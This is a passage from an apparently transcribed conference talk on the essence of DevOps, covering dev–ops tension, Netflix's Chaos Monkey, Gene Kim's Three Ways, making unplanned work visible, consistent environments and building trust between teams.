in a day, so you might as well work on the hours that pay the most, and performance work is really, really fun. And that's how I sort of ended up in this role, for better or worse. And I didn't realize it at the time, but DevOps, this term you'll hear thrown around, is about making really, really good quality software. And I had discovered a number of years ago that every time I had really
good software, really fast systems, there was a really great team behind it. And we've hung a new name on that today, and that's DevOps, and so that's how I ended up talking about this. So, day to day, my life is: I do some architecture consulting work for a variety of firms, mostly building large-scale systems. I make conferences, and I go to a lot of conferences. My conference is called DevIntersection. We do two a year: in the springtime we do one on the East Coast, typically in Orlando, and in the fall we do one in Las Vegas. Pretty similar to NDC in a lot of respects, but a different group of speakers, because I talk to a lot of people. I make a ton of podcasts. Any .NET Rocks listeners in the room? Awesome. Well, welcome. So these are free to download; they're audio talk shows. .NET Rocks is the original one. Carl created it back in 2002, which I always find amazing, because the word podcast wasn't invented until 2004; he was just putting MP3 files on the internet. I came on as the co-host in 2004, at episode 100, and today we published episode 991. We'll record 10 shows here this week at NDC with a variety of speakers. They're free to download; we publish three a week. Tuesday shows tend to be technical, so next Tuesday's show will be Dominick Baier and Brock Allen talking about single sign-on with OpenID Connect. Wednesday shows tend to be more mobile- and tablet-focused, so we've got Chris Hardy from Xamarin talking about the latest in Xamarin.Forms and their cool technology. And then the Thursday shows are where we have some fun stuff we think you might want to know more about; maybe it's history, or it's your career. Sometimes we go way off track and we talk about stuff like alternative energy. The show I've currently got planned is Bryan Hunter's conversation about building communities around functional programming. So that's DNR.
It's the big show. We used to have a show called The Tablet Show, which we've now wrapped up because we've rolled it into .NET Rocks; that one was focused on mobile and tablet. And RunAs Radio is me exercising the other half of my brain, because I live as much in the IT world as I do in the development world.

So, this whole DevOps thing. We've all heard the term, but what are we really talking about when we say DevOps? I'm going to talk about the fundamentals here; that's why I call it the essence. It's about building better software, and we've been trying to do that for a long time. You know, I've read papers from the '60s of people complaining about software problems. It's gone on forever.

The term DevOps was first used in anger in 2009. There was a guy named John Allspaw, who writes a great book on web operations, and at the time he was the operations lead for Flickr. He did a talk at a conference called Velocity in San Jose, California, and the Velocity conference is all about high-performance websites.
That's where the Facebook guys go and the Google guys go. If you want to know about high-velocity websites, that's the Velocity show. And what John did was a talk called "10 Deploys a Day." He had gotten Flickr, this photo website that Yahoo owns, to a point where they were pushing a new version of the website ten times a day. Which is crazy. That's a lot just running your build process that fast, much less actually making any changes to anything.

But the conversation he had was really interesting. It was about the relationship that had to exist between the development folks and the operations folks to be able to push code that quickly, and he showed the advantages that were there. Now, that's the LAMP stack; that's not the .NET world. It's a very different way of thinking about software, but it was showing the advantages. Really, the ten times a day was almost a decoy. It's a byproduct of having teams working together really well, teams that really understand and value the differences between them, so that they get that synergistic effect where one plus one equals three or more. That's what we're trying to get to: how can we put teams together that work at a level of efficiency that's dramatically better?

Part of this comes down to this idea of an application lifecycle. Who here would call themselves a developer? Everybody a developer? Anybody willing to call themselves an operations guy or an IT guy? It's you and me, man. Because, you saw the bio slide, I've been in computing for a long time. I've done every job you could think of at one time or another, and they're all different. There are some fun parts to being an IT guy.
You get to say no a lot. You usually get an office with a door. I put a sign on my door that said "No. Any questions?" because I wanted to establish our relationship before you knocked. The problem with being an IT guy is that when you do your job perfectly, and I presume you and I are both doing our jobs perfectly, nobody can tell. You're invisible, because stuff just works. You can get a C; you can never get an A. And I'd get lonely: start turning a server off, phone rings every time. "Hi, miss me? We'll turn that back on for you, how's that?" Right? It's easy to get an F, turn a server off, but you can't get better than a C.

Now compare that to the development guy. The development guys, well, we write software. We have shipping parties. There are no shipping parties for operations. "Nothing crashed today, let's get a beer"? That's not a party. It's not the same thing. But when you create new things, it's celebrated. You can get an A. You can get an F too; we've created some pretty crappy things along the way. But you can get an A, and so there's a tension between the two.

So when we talk about application lifecycle, usually we're thinking in terms of development. But what if we include operations in that as well? Now I've got to pull up a diagram, which, okay, let's talk diagram.
This one comes from Microsoft. Let's not hold that against them, or hold that diagram against them. What I like about this diagram is that it shows two orbits, two cycles, and a larger overall cycle. On the left we have this development cycle that we're probably all familiar with: you get requirements, you have this thinking time that breaks them down into features you want to build, hopefully you build some tests around that, and it finally comes together in some code that becomes a build. At some point you throw that build over to operations and say, "Hey, put this on a server for me, would you?" and then you go back into your iteration again. And the Agile movement, or the Extreme Programming movement, or the SOLID movement, or the craftsman movement, whatever approach you're taking to build better software, has been focused on that iteration.

Most of the time we sort of ignore the barrier we hit at the bottom of this diagram, where we get a build and pass it to operations. We'll complain about why operations says no and slows things down, but we don't really understand the cycle on the right side of the screen. Because that cycle, like the development cycle, goes around: deployment is a big part of our lives as ops guys, and management, keeping systems up and reliable, and monitoring are a big part of our job as well. And hopefully, hopefully, there's some kind of feedback mechanism so we can actually take the information from our experiences in production and push that back.

In fact, every organization I've ever worked with over the years has that larger cycle. It's really just a question of how quickly you get around it, and what the quality of the information is that comes out the other end. Because sometimes the only feedback I'm getting from operations is when they pass me in the hall and go, "Wow, your software really sucks." Or when the CTO phones and says, "Why is the website so slow?" I mean, that's feedback.
It's just not very precise, not very detailed, not very frequent. You know, maybe we could go faster on these things; we'd get better at it. So if we're going to talk about application lifecycles, the whole cycle, let's include everybody who influences the success of the application. And so DevOps is not a good enough term, because it's not just the developer and operations folks: the QA folks, the infosec folks, the domain expertise, and the customer all influence the success of the application.

Look, we all want to have a party. The question is when to have the party. Step one of DevOps: don't have a party when you finish writing the code. And don't even have a party when they deploy it, because that's not everybody. The only point where I could actually feel successful about a piece of software was some period of time, some weeks, after a deployment, when I could show that my customers were using it and loving it. Then I had a party, because at that point everybody in my lifecycle had had that experience with the latest version. That's something to celebrate.

But it's hard to find those things, and it's hard to get started with this, and it's hard to even understand what success is. What is successful software? This gets into the great debate about what quality software is. It's one of those things where you think, "I know it if I see it," but how do you actually measure it, or come up with a term or a meaning around software that people can really relate to?

I like the concept of observable software, because I've had that experience, and I'm sure you have too, where we understand how the software works because we built it, but you put it in the hands of the person who has to use it every day and they're baffled by it. I'd go all the way back to writing apps in VB3 on Windows 3.1. There was that older lady who had been filling in paper forms her entire career.
And now, in the last few years of her job, we put a PC on her desk. I had recreated the form that she lived by on that Windows screen, so she could type the information into the fields, and at the bottom there was that Add Record button. She'd click that button, and that would take all that data and package it up to send back to SQL Server 4.2, so it was going to take a while. So I put up that little hourglass, to say "I'm busy now."

And what was her reaction to that? She'd fill in the form, and she got that, but there's no button on her piece of paper. So she'd put in that value, push that button, and then she'd ask me, "Now what's it doing?" There was a point where there was no observability as far as she was concerned anymore. She didn't understand what was going on, and I had to recognize that was a failure of the software.

Look at modern UIs today: we're doing a lot to make apps more observable. Why do screens go from one to the other the way they do, flipping over like a page? It's about giving a sense to the mortals that they know where things have gone, and if the page flipped this way, maybe it flips back that way as well. It's the way that we hint in UIs, so that we give visual references. I would also say that our users are generally getting more educated. I think Facebook is responsible for teaching average mortals that database updates take time, because they always post their update and then try to see it right away, and it's not there, so they post it again, and we all feel foolish; we see double posts, right? So, bit by bit, Facebook has been educating the general population: send an update, give it a little time.

All right, but none of what I've said here is that unusual. We've been complaining about software quality for a long time. We've had a lot of movements along the way to make software better. You remember when management first found the word "agile" and liked it? "We've got to get the guys some agile." Like it came in a squirt bottle.
Just spray this on your developer; he'll go faster. I think it's going to happen to DevOps too. It hasn't happened yet, but I think it's coming. DevOps comes in a squirt bottle; I've already seen somebody selling DevOps in a box, like it's a product. Like agile was supposed to be a product, which, you know, it's not. We call the session "People, Process, Tools" for a reason. It starts with people. It starts with a cultural belief that we can make our software better. Then we can apply processes to start putting that in place, and only after that do the tools make sense, the things we need to use to make the process easier. Without the cultural change, nothing else happens, and culture doesn't change overnight, and you can't change it all at once.

But I also think there are some technical aspects that are making DevOps more visible today, and part of this has to do with things like virtualization. If there's any single technology you can lean on and say, "Why are we talking about this now? Why are we talking about going so fast?", virtualization is a big piece of it, because virtualization itself has evolved a long way. I first encountered virtual machines in the late '90s, when we were dealing mostly with installation problems. It was a testing tool. It was the ability to keep images of the different machine configurations you had to live with, so you could test whether you could deploy your software successfully to them, and when it failed, and it often did, it was easy to roll back and try again. It was just a way to iterate on multiple platforms at once.

And then virtualization evolved. It became faster and leaner. Intel and AMD implemented some low-level instructions in their processors so that virtualization could be very, very thin, and it took over the server world. How many people here have production servers that are VMs now? Production servers?
It's most of us. You know why? Because it serves a great purpose for the operations guy. Now we have this ability to upgrade hardware without having to rebuild the VM; just move it to a new machine. When you get really good at it, you start seeing this cloud world, where where the VM actually lives is irrelevant. It can float from machine to machine; it's kind of transparent. You can create more of them. And so we've commoditized the infrastructure and made it much easier to create new instances of things faster.

I also believe that the way we build software has evolved in a very positive way. The diversification of languages has created an environment where we understand how testing should work and how change management should work, so that if you want to iterate faster, you can compensate more quickly. And without a doubt, we're going faster than we used to. You know, I remember when we felt like rock stars for pushing out a new version of the app every year. And then we got that down to six months. Now where are we? Three months? Twelve weeks? Faster? Slower? Six months? Two weeks? Oh, two weeks is fast. A month? You get a build out a month.
I mean, that's normal. Twelve weeks: I've seen lots of folks that are very happy to be iterating at a twelve-week rate. And I'm working with a customer's e-commerce site; I do a lot of e-commerce-related work. I know it well. It's about making fast websites, and we're good at that. You know, one of the ways we create quality software, it turns out, is to go really fast, so that when they click the button, it goes on to the next thing right away. That's another way of creating observable software, because something happens. So making stuff go fast was an easy way to solve that problem.

But when you're in a twelve-week iteration and you're feeling pretty good about it, because you came from a year, the fact that people want to go dramatically faster seems odd, right? Well, that's what John was also talking about when he wanted to do ten deploys a day. What the heck does that actually buy me? Part of what it buys you is the ability to react very quickly to bugs and problems, and to fight back from the downward spiral. Because the downward spiral, we've all been in this. It's the life-sucking "got to get it out" mentality on the app.

Usually it starts with management, a VP, because they're bad at this. He announces a new version of the product and sets an arbitrary deadline, with a set of features that he's announced to customers, and they're all very excited about it, because every piece of software you haven't shipped yet works great. And now, with a hard deadline and a hard set of requirements and a fixed budget, we have to deliver it. So we cut corners, because what else are you going to do?
You've got to get there. "We'll fix it later." Build up that technical debt. And when it finally gets deployed, the ops guys have a really tough weekend trying to get the thing to actually stand up and keep running for any length of time. And when it does finally get up and running, it's still crapping out every so often, having problems. So you have that steady stream of crises going on while the new version is running, and customers end up not being that happy with it. It's not fast enough, it's missing a feature, it keeps crashing, "I get halfway through filling in the form and it goes away." That's the battle that happens, and as customers start to give up on it and you start losing market share, what happens next? The VP shows up to save the day, with a set of new features that people are really excited about, and a hard deadline, and a fixed budget. Let's go again.

We've been through this, and we know what happens, and it's depressing. It's frustrating, because you know you could build better software. And when you have those hard weekends, when the thing tanks on a Saturday and sales are basically lost, Monday morning you have that awesome meeting. The senior ops guy who's been up the whole weekend, with one of his juniors with him; the architect and a lead developer sitting on the other side of the table. Maybe a manager shows up. The VP shows up and goes, "Guys, we can't have a weekend like we just had. I know you can work it out," and then he leaves. He's got to get his golf in. Which arguably is not a bad outcome, because I don't think I actually want him in the room. But what happens with that conversation?
Well, pretty quickly it degenerates into "If your infrastructure was more reliable, we wouldn't have these problems." "Well, if your software didn't suck as much as it does, we wouldn't have these problems." And eventually we agree we don't have enough information to successfully accuse either side, so we plan for another meeting the following week, and then we leave. Then, when the fifteen-minute reminder pops up from Outlook a week later, you quickly grab some log files to be used as evidence against the other guys, and then you do that meeting again. It's not a constructive process, and it's very hard to build better software and better systems doing it this way.

So here's the thinking, because I think our industry has changed as well. There are no businesses now that don't use software. It's just as crazy to have a business that doesn't have a website as it is to have a business that doesn't have a telephone. We're getting that way with mobile apps now, where the expectation is that we have mobile apps that communicate with our customers. So software has become the business.

It didn't used to be like this. For a long time, if you've been doing development for a while, software was almost a luxury. Maybe it was a competitive advantage, but we could still do our business without it. These days you talk to a customer and they're not thinking about software development as a competitive advantage, or as a capital expenditure; it's just an expense. It's like: if I turn these servers off, how much work do you guys get done? What does your job look like?
"Well, we can't do anything; we have to go home." Probably fairly important to the business, then. So it really comes down to this: there are no longer any technology problems. There are only business problems. And ultimately, businesses aren't anything except people, actually. So it's a people problem.

And I've felt like this for a long time now: there's nothing I couldn't do in software. The question was, could this team do it? The machines are fast enough; we've got enough hardware. Can we do it? Can we actually figure out what we need to get done in a timely manner, and be responsive to what the business needs? Because that's what it looks like today.

There are businesses out there that have got this nailed, and there are great quotes coming from some of them. One of my favorites comes from Adrian Cockcroft: "Do painful things more frequently, so you can make them less painful." That's Cockcroft, the architect at Netflix. We all know Netflix, right? These guys used to rent DVDs by mail, in a little red envelope. That was their business. You remember DVDs? And they were smart enough to figure out, "We really should do some internet things." So they moved their business over to streaming, and they did it on the cloud. At peak times, which is evenings in the US, Netflix is like 25% of all the traffic traveling over the internet in the US. In the evenings, that's more than porn. How do you think they load test their system?
Because there's not enough internet to go around. This is a pretty tricky problem. I'm not saying we all have the problems Netflix has, but you've got to think: here's a high-water mark. Here's a group of guys building software that's really tough to test and that has to be reliable. They make no money if you can't watch your movie. And heck, even if you can watch your movie, if it's a little jumpy, it's not good enough; I'd rather have my DVD. So they battle some pretty tricky problems, and they've come up with an interesting team. It's very responsive. Cockcroft also talked about how, when they started calling the developers at three o'clock in the morning for an outage, they had a lot fewer outages. He's tackled a lot of these problems.

They also built a set of tools called Chaos Monkey. Anybody heard of the Simian Army? It's on GitHub; you can download it. What they finally realized is that the only way for them to make more reliable systems was to create a piece of software. And Chaos Monkey, you don't choose Chaos Monkey; Chaos Monkey chooses you. This is a piece of software that kills servers inside of Netflix at random, 24 hours a day. It's the only way for them to know, right? If Chaos Monkey can actually kill a system, that's a bug, and Chaos Monkey doesn't succeed. And Netflix got so good at this that when Amazon had a major outage and the Amazon website was down, they weren't out. Netflix was still running. They're more reliable than their service provider now. That's pretty impressive, but it speaks to how good software can be.

So if we're really going to get into this, if we all recognize that we live and die together, that we're responsible for the success of the business, because that's where software is at right now, we've got to do something. We have to think a different way. So now I'm going to believe you're on board. I agree, I'm here, let's do this. How do we get started?
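The Chaos Monkey idea is simple enough to sketch. This is a hypothetical toy version, not Netflix's actual tool (the real Simian Army is on GitHub): pick a random instance from a running pool and terminate it, so the team finds out, on their own schedule, whether the system survives a dead server.

```python
import random

class ChaosMonkey:
    """Toy chaos-monkey sketch: maybe terminate one random instance per run.

    The instance list and the removal below are stand-ins for calls
    to a real cloud API; everything here is illustrative only.
    """

    def __init__(self, instances, kill_probability=0.5, seed=None):
        self.instances = list(instances)      # instance IDs still running
        self.kill_probability = kill_probability
        self.rng = random.Random(seed)
        self.killed = []                      # audit log of terminations

    def run_once(self):
        """Maybe kill one random instance; return its ID, or None."""
        if not self.instances or self.rng.random() > self.kill_probability:
            return None
        victim = self.rng.choice(self.instances)
        self.instances.remove(victim)         # a real tool would call the cloud API here
        self.killed.append(victim)
        return victim

monkey = ChaosMonkey(["web-1", "web-2", "web-3"], kill_probability=1.0, seed=42)
victim = monkey.run_once()
print(victim, monkey.instances)
```

The point of the design is the audit log: every kill is recorded, so a failure that takes the system down can be traced straight back to the termination that exposed it.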
Now I'm going to talk about a guy named Gene Kim, one of the godfathers of DevOps, and he talks about the Three Ways. So let's work through the Three Ways. The hardest one is the first way. The first way is systems thinking. The challenge now is: I need to understand the work. How do we really build software? How does software actually get built in my organization? And this is powerful stuff, because it only takes one or two people to do it. You can't change a culture overnight; it doesn't work that way. You can't just say, "Today we're going to do DevOps; things are going to be better." We have to start incrementally, and part of it is just understanding what's going on. If we want to understand the flow of work, it'll naturally improve itself. It's a funny thing that happens when you look at stuff: it gets better. Because most of the time, we don't look at things.

I've spent a lot of my career as a consultant. The fun part about being a consultant is that you don't know anything about the organization or what they actually do, so you tend to walk around the room asking people what they do and how things work. And every so often you find that white elephant. You're like, "You guys know this is an elephant, right?" "We don't talk about the elephant."

So, a long time ago, in the '80s, I was a master at high-performance printers. Back when that mattered, right?
So there's this company. Sometimes you need really, really fast printers, and fast printers are expensive, so getting the right printer was a big deal. I was well known in Vancouver as the guy who could get you the right printer. I knew all the sources; we'd get a reasonable price for it. But when you're spending 50 grand on a printer, you'd better get the right printer.

So this company was doing a GL dump. I get a call: "Hey, we're doing this GL dump and it's taking three days now." They were printing out their entire monthly general ledger. Remember the ledger paper, the white stuff with the different colored bands, the green and white bands on it, tractor feed? "It's taking us three days to print it out. The boss says that's taking too long; we need to get it under a day. Can you get us a printer?" "I can definitely get you a printer. But why the hell do you print your GL out?"

So I go and visit the company, and we're looking at it. They've got a nice printer already, and the GL is this much paper. It's huge; the thing weighs 30 pounds. "What do you do with the GL?" "It's required to be printed out every month." "For what?"
"It's just required. We have to do it. The boss wants it." I couldn't get an explanation. So I thought, you know what, before we get a new printer, I'm just going to follow this GL. Let's print one out. So month-end came, we ran this thing, and it took three days. And when it was finished, it was this huge stack of paper, and this nice lady picked up the stack of paper. So I followed the stack of paper. She went to the CFO's office, put this gigantic stack of paper in the inbox, and then she left. So I sat with the paper. Eventually the CFO came in, saw me, and then he went, "Oh, the GL's here." And he picked up this big pile of paper, put it down on his desk, flipped it over, tore off the bottom page, the one with all the totals on it, and started reading it. I said, "Is that the only part of the GL you use?" He goes, "Yeah." I said, "If I could print out just that page, would that be useful here?" And he said, "You can do that?" Just following the workflow, you know?

Because we have this problem, and people talk to me about it all the time, where they feel like they're a cog in the machine of the development process inside their organization. They figured out you're a UI person, so you're the UI guy, and you're going to get requirements in from the architect, and you're going to build your UI piece, and you're going to pass it along to the services guy so that he can build his piece, and that's all you have to worry about. You know, you're a gear, and there's a gear here and a gear there; just make sure you know about your gears, thanks for playing. And it's very hard to get better. We don't like that. I want to do other things. I want to grow more. I want to experience other ways to build software. I want to try new technologies. I don't want to be a cog. Part of not being a cog is actually understanding the whole flow of work. Where does the work go? So, how do we look at the whole system?
And the side effect of having different pairs of eyes understanding the whole system is that you start finding other ways to fix things, ways that things can be better. So how do you get started with this? It starts with that cultural requirement: I want us to get better, and I think I can get better by understanding the flow of work. So now we want a process in place, a process of starting to understand the whole flow of work. And so Kim talks about this first and foremost: understanding what work is inside of our organization.

All right, so I want to get better. I want to understand the whole flow of work to make things better. So we're going to start defining work. Now, we could talk about a tool, but all I want to do is define work. I could do this with pen and paper. In fact, the most effective way I've ever done this in an organization was with a big whiteboard and post-it notes stuck to it. Initially I just wanted us to write on the whiteboard, but that was too inconvenient, and I'll tell you why. I wanted to get everybody, both operations and development, to write down what they were doing every day. Not to measure it, not to change it, just to know what it was. And most folks couldn't get to the whiteboard often enough, so we ended up using post-it notes.

Now, this breaks down quickly into four classes of work. The top two are easy ones. Business projects: why are business projects easy? Everybody knows what they are. I could talk to almost anybody inside that overall IT organization, ask what the major business projects going on right now are, and most people can list them off, whether they work on them or not. Why?
Because managers are involved, and since managers don't do real work, they have to make noise. Actually, that's unfair: they have budget. As soon as you have a budget, you have to explain what you're doing, which means you need to have a story, so you talk about it, so people know about it. Major projects have project plans. They have a budget assigned to them, they have deadlines, they have goals around them, and you bang the drum about it. It's important.

And that's also true of most internal IT projects, though maybe not as consistently; basically every business project is known about, and people talk about them all the time. Internal IT projects, a new source control system, new testing infrastructure, clustering the databases for reliability: all internal projects for ultimately making the system better. They often have budget associated with them as well, so they tend to be known, but not always. Clustering the databases is a great technology. It actually makes the database more reliable. But if you don't tell anybody, if the ops guys do it and don't tell the dev guys, you'll find that it doesn't help you at all. It turns out you actually have to write software to take advantage of a clustered database. It's true. So actually making that visible is kind of useful to the organization.

Where this gets interesting is when we get to the last two items: the changes and the unplanned work. And this is where I found out we really needed post-it notes, especially for the ops guys. Dev guys too, because you get calls. You're in the middle of writing the code for the new thing, and they call you and say, "Hey, I really need you to fix XYZ right now. Just stop what you're doing, fix it now." And so you change, you do that great context shift. I mean, it's a terrible thing about development, right?
As a developer, I learned pretty quickly that my productivity was measured in interruptions per hour, and the correct number of interruptions per hour for me was 0.25. Because if I really want to write a chunk of code, it takes me about four hours. You know, when you first get to work and you're going to write some code, it takes you about an hour to get going. I call it picking up the threads: you sit down, look at the requirements, and think, "What the hell were they thinking?" And then you look at the code you've written so far and go, "What the hell was I thinking?" But then you remember, and you sort of get back in the groove. That's 45 minutes, an hour, and now you start to write some code. Write a little, run a little, write a little, run a little. Stuff starts; you know, that magic time. We're actually creating, building something new. Organizing electrons for fun and profit. And then about three hours in, it's working. Something good. I'm ready to check this in, but I haven't followed any of the coding requirements, so I have to clean it up, and that takes about an hour as well, right? You follow the documentation requirements, maybe refactor a couple of things, check in. If you get interrupted anywhere along that flow, you almost have to start over. You pick the threads back up again and try to go again.

That's why I found that working during the day was just a mistake, because people keep interrupting me. I had a sign that said "Interruptions per hour," and when people would knock on the door or the phone rang, I'd come over, change the number, and then say, "Yes?" Because you're interrupted; it's over, right?
You might as well make your point. That's how I started coming in at noon. Then I'd go to lunch. Then I'd come back and it's meetings all afternoon, because there are always meetings all afternoon. And somewhere around six o'clock, when the noisy people go away, I start to write code, and I'll probably have a pretty good check-in about ten. Then I go home, and I come in at about noon. And as a manager, I got really keen on this: don't interrupt these guys. Interruptions really, really matter here.

So as I started monitoring changes, I started asking folks what changes they were making, on both the development side and the operations side; there are a lot of changes that go on. So I was giving people stacks of post-it notes: yellow ones for changes, and then red ones for unplanned work, for actual crises. The drop-everything, the-site's-down, fix-this-right-now stuff: that's the highest priority. People get addicted to crises, because you don't have to think anymore. You don't have to actually make a plan. It's the biggest thing, the room is on fire; pretty sure we're going to focus on that. They get kind of nervous when there's no crisis anymore, because now I have to think about what to do next. When something's on fire, I know what to do.

And you get really freaky changes too. So I'm working at this organization, and we're doing an architectural review for a new version to ship, and the whole system goes down in the middle of the architectural review. We hadn't changed anything; we were sitting with the guys going through design, figuring out what we're going to do. It's like, "Hey, the site's down." How did they know? Somebody phoned, right? And the first thing they all do is open up the web page and try to hit the site. "Hey, it's really down, how about that?"
Like they were hoping the guy was lying, maybe the site would just come up for them. And so I was happy to be there, I'm a pretty good guy in a crisis, and rule number one is don't change things, don't actually make the problem worse. Let's start with what's happened, let's go get some logs, where are we at? We're starting to make a plan, about 10 minutes into the site outage. This guy, he's not a senior tech guy, but he's been there a long time, got a ton of domain knowledge, nobody's really sure what he does, but he sort of wanders out from the back room, says, hey, how's things going? And he's like, oh, the system went down. Oh really, how long has it been down? About 10 minutes. Goes back into his room, and hey, everything comes back up again. I'm like, excuse me for a minute, walk over to his desk, sit down. So what'd you do? Perfectly ordinary change requests come in all the time, right? Not happy with this query performance, can you change this index around? And he rebuilt that index and it created a locking constraint, took the whole system out. And so he dropped that index, the system all came back up again, and he was going to clean up the mess. Didn't really think about it, it's stuff he's done every day. So I was like, I'm not trying to change your work, and I'd prefer you didn't crash the site, but can you just write that down? And so these guys would come out of the back room twice a day and just cover the board with post-it notes of all the stuff that they'd been asked to do. And after a week, we had this huge whiteboard covered in post-it notes. The row of notes for the business projects was about this big, for the internal projects, maybe a little bit bigger, then changes, and then a big chunk of unplanned work depending on how healthy your system actually is. So a few things came from having that board. First is, my dev guys had a sense of how much stuff the ops guys do every day. You know, what's on that board really when you look at it that way?
Technical debt, that's what you're looking at, it's a visualization of technical debt Every shortcut we've ever taken, every I'll fix it later, every time they didn't bother to script the deployment Or document the web config file, ops is just as guilty as dev and some of this stuff It turns up in these post-it notes now And so the other thing that happened was the dev guys look at it and go, wow, you've had to restart that server 15 times this week I could write you a script that would reboot it for you automatically, or we could find out why the heck it keeps crashing But either way, as soon as different eyes were on these kinds of problems, bunches of them go away They were fixable, then the manager comes in and we're like, you want to know why it takes so long to ship a feature? It's this stuff, it's technical debt So now we can actually define a feature cycle, I can get rid of all of these if we can get two devs for one cycle to fix this stuff These then go away, you start to be able to quantify things, because you can see them That's the biggest problem we've got when it comes to defining work and making it visible is most work's invisible You know, your board never started out this way, this is years of effort to have that many changes going on in a given day You've got to really work at it, it's not easy to do So it was the time it took to actually mature the process, mature development, to see this Once we had that visibility and we started grouping these and saying, how do we fix some of these and make them go away? 
There were certain fundamental things we knew we needed, it just became absolutely apparent One of them was environment creation So here's the thinking, we know that ultimately the most important environment in our business is the production environment The production environment is where we actually make money, and that production environment is virtualized and it has a particular configuration And there's a whole class of problems we're having because our dev environment and our QA environment don't match production They don't have to be exactly the same, but they have to be configured the same, and virtualization makes that way easier Because now we start building templates for the configuration environment for production and we can trickle them down to everybody else So there's one common environment for everyone What does that mean? An example would be SessionState in ASP.NET By default, when you stand up a new copy of Studio and you run a local version of ASP.NET, you go to in process session You can code against that all day, but you got out of process session in production Which means when you go to deploy, if you've done anything silly to your SessionState, which is easy to do, you're going to be hit by it It's just a problem waiting to happen So what if we make sure those configurations match? And the easiest way to do that is to have the environment managed by production And a bunch of things come out of that. 
One is it's absolutely consistent, so a whole class of bugs go away. The second is when you need to change the environment as a developer, which you will, you have a conversation with production before you make the changes. You're going to have the conversation one way or the other: you make changes, you go to deploy, and it breaks, there's going to be a conversation. It'll be an unpleasant one, but it'll happen. But what if we had the conversation first, and we get people actually thinking about the consequences of those changes, because they have to implement them, they change the template, push it back to you. Well that's interesting, because now we see it coming, we can test it in advance, we know more about it, we can move faster. Same with a common build process, one button click for a build, right? It's absolutely a given. The things that come out of the first way are one source of the truth: code, configuration, the environment, they're all in one place, they're absolutely consistent. And the build process is one click. It needs to be one click, it needs to be so easy you could do it by accident. Oh darn it, you did a build, right? If you're still in the world where there's one guy that knows how to do the build because he's the only one that knows when to sacrifice the chicken, that's tough. What happens if that guy goes on vacation?
I had one of those back room guys go on vacation, and we couldn't do a build the whole time he was on vacation. I didn't put the two together, nobody knew he went on vacation, it's just all of a sudden the build process was failing. Turned out we had a security limitation that didn't allow us to deploy certain files, and this guy would see it come up as an operations manager error and he'd just fix it every time we did a build. And he never told anybody, and it wasn't until nobody could do a build for two weeks and then he came back, and the first day he was back the build worked, and I'm like, what changed? And then you ask him, he goes, oh, I see these errors all the time, the easiest thing to do is fix it that way. Okay, how about we make it so those errors don't happen anymore? Visibility, there's lots of these things that go on. Big challenge with getting one source of truth: is your database in there too? Getting the DBAs on board. Do you think Ops is grumpy? Try DBAs. I've been a DBA, it's a hard job, because you guys keep changing things, and all the customers end up being named John Smith. Who gets blamed?
The biggest problem when you're a DBA, especially if you've done it for a while, is that you have this belief that you own scripts, that the value you bring to the organization is change scripts: the ability to change the database from whatever version it is now to the version it needs to be for whatever you guys want to do next. And it's not true. You need to own the schema; change scripts are easy to make, there are tools that will do it for you. The schema needs to be treated like source, the data has to be protected so the tools need to protect the data, that's inevitable. But getting DBAs to change their minds about what's valuable, very time consuming, it's hard to do. When I find folks that don't want to change, when they fear change, when the conversations are so broken down, they're so negative, you can't go anywhere, I know there's scars, there's scar tissue there. You're really thinking about this going, there's no way I could talk to the Ops guys, they won't even answer the phone. It all depends on the level of communication we have, and there's a progression there. IM is the lowest quality version of communication you can do. Arguably Twitter is the same caliber, it's just it's also in public. So if you're texting with someone and you go more than three iterations, change the medium, move up, try an email. But email can devolve pretty quickly. My rule is if the number of paragraphs in the responding email is longer than the previous one, you're failing. Email should get shorter as the conversation progresses; the perfect email is an email that says OK, then you know the conversation is finished. But if I write three paragraphs about a problem and you come back with 12 paragraphs as a response and I write 48 as the response, that's not a constructive outcome. Change the medium: phone call. Phone call doesn't work, meeting. Meeting doesn't work, go to the ultimate form of communication: pizza. Food. Humans are hardwired to like people they break bread with. So one of the proofs I've got that a situation is really bad in an organization is when they will not come to the lunch. Because we're hardwired: if we eat with people, we're gonna like them more. And so much about building great software and great systems is about trust. Trust in the differences in the people, that they have different skills than you and they're valuable at them, that their job's hard too. And you can't really grow trust inside of work. Work is where you challenge trust, where you exercise trust, where you prove that you don't trust that guy. How do you actually grow trust? And for the average work day, the only time that we can grow trust is at lunch, because it's the only time we're not at work, but it's still the work day. If you're working with a group of people, and probably you are, or you're leading a group of people, plan your lunches. They're the most valuable time you've got, they're the time when you can actually grow a little trust. Now there are other opportunities if you want to build them. We've done after-hours exercises, just make sure it's stuff that people actually relate to, and trust falls are not one of them, right? Maybe it's World of Warcraft tournaments, whatever folks can relate to, so that they can get to know each other, talk to each other more. The powerful thing about code reviews is folks actually talking outside of actually doing the work. So when it came to connecting with the ops guys, we had lunch with them, started understanding their sets of problems. They're having conversations now, and things could get better. When this starts to happen, and when things actually get better, the byproduct is that we go faster. You just scrutinize the whole workflow and pick up the dumb things, pick up easy stuff like finally getting the build process where you wanted it, because you always wanted it there, we just haven't done it, right?
There's things to do to actually get it there. Things will go faster, and software gets better, and it'll point the way to the second way. Folks ask me, when will I know it's time to go to the second way? When the next problem you have is, we still don't know enough about the system. The second way is about feedback. So in the first way, we just went all the way through the flow and we saw the whole system, and what'll come from that is not only the easy things to clean up, but as soon as the easy things are fixed, now we get to the hard things. How do we measure better to know to do better? There's two basic sets of measurements I care about: our development process, and our operations process, or how the software actually runs out in the wild. So, culturally, I know I need more feedback, so I can understand everybody's concerns inside of the system. Process-wise, it's how do I do it quickly, low cost, and super accurate, so it's short and loud. The more I know, the better it gets, it just makes it easier to push through the first way again, in that I understand more about the flow, and more about the flow, and more about the flow. So a lot of this is about tooling, actually. How many people are using TFS? For something other than source control? Yeah, there's quite a few still, right? Actually using the work items, actually using the instrumentation on it, because it is instrumentation of our development process. So back in the late 90s, early 2000s, when the dot-com boom was on, I figured out pretty quickly that I could build better quality software if, when we did a deploy and we ran a bunch of automated tests, if they failed, I could get back to the developer quickly. And the faster I got back to them, the less time it took to fix it. Why? Well, we already know it took them four hours to get there, right? Now once he does that click and deploy, right, or actually builds it, checks it in, and the build process goes on, the tests start to run. What does a developer do next?
